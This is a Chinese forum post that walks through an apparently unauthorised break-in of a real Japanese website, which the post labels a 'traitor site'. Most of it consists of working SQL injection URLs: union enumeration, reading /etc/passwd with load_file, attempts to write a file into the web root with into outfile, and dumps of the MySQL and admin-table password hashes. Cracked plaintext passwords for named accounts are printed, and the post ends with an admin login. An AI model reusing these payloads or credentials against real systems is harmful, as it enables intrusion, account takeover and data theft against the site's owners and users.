原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

0 F; m' b% j  a* t- w- Q( D
0x01. 检测 www.zuaa.jp 收集数据

  [+ F3 `0 ]' k, y7 c, g
0 @% f; B+ ?) e6 W2 Q1 `2 swhatweb


, }+ V/ ?9 k) r/ \& S利用NMAP扫描
3 R4 I* ?: X0 m0 e; _$ M; ~1 O% e, m
$ ^# `: z) P  b0 H中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390

7 W9 s8 b* H# r1 X+ U) G5 N
0x03.order by
* W" J6 L2 o9 B( Q  X4 d             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1

- X7 d1 q) }2 R/ {, p  m( S8 `order by 28报错，order by 27正常
, A1 w* h. Z% Q
0x04.   union手动查询
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
! p% v( W* \% f; o# C
0x05. info:
- z, a3 _/ w% Dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

user:            root@localhost
database:    openpne
version:      4.1.22
os:             portbld-freebsd5.4

* i% l; S. h& w" _% I* {0x06. root用户
) [- s& E! n, H; u' j利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
# B9 Q' Y9 n1 Y2 n1 v; a7 A4 N5 Khttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
; N/ A2 [$ N( m
通过工具转换

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
8 Q6 r" z% [" L$ X7 p, M4 \
0x07. 利用 into outfile
9 ]  A, ^6 j' n9 R' u! l% F全部都失败
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
! n7 D7 d- J2 u8 [
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
$ q8 g& T7 H3 w: m! l$ O
# I3 f% n9 j( ^! q1 n5 m页面显示“MDB2 Error:syntax error”

0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
$ N# J0 A4 a% x; F2 ~; v中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持



5 z. ?3 O$ [8 D- u0x09. 查找后台
- I; p4 t$ c4 S5 r利用 现有的各种 后台工具尝试都不行
5 i, M6 e7 R/ q# S6 c
" l0 K! Y3 M7 r  U, E0x10.  MySL外联方法
7 @$ p2 d* h7 [% Q从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
3 V: z: n; ~* e可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
/ k8 m7 d, n; [& Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
+ u, V$ H) {: y8 i
/ t6 v/ U: w. w3 i1 G; A这个可以在 www.cmd5.com 解密
2 t1 C' K4 a+ V  x  {9 s$ _. d3 yroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
8 d/ @2 K" ~+ C; w7 {; Bopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
1 A' z) {8 n8 ]7 A7 Pzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

: x3 e1 J" d' g3 U3 V
0x11. 网站突破
! u* A( o: q" F发现网站的源程序 openpne, google 下载 openpne 源码


, _4 H. ^0 B9 {0x12. 默认信息利用
: a3 v% y6 n% j- Yhttp://sns.zuaa.jp/?m=admin&a=page_login

9 k: K4 Z8 l% l. C表名 (c_admin_user) ，字段名（username,password）
! H3 G1 V# k2 ?" m# B5 N' Jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
/ x3 {7 _9 T6 F3 N
解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
% k, o# V: i3 x" q! A
  ~  A$ z0 [: V" O. A0 \& M中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0 f# f! u8 |. r- H5 M0x13. 登录后台
8 }% K/ Y3 ~3 `3 S9 _

$ r. S. z- [8 z4 t2 W0 }
, ^5 h+ m' x2 @6 A% n3 w0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
& W  }& O- d/ A* e感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
# U2 h5 e; C! Q+ u/ L------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
; M' I+ x) G) ^# L6 l$ {中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
5 B' S( P5 m/ b0 z
最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
! R+ W  |- q, o

荒村狂客

哪个牛人 费的这劲 入侵的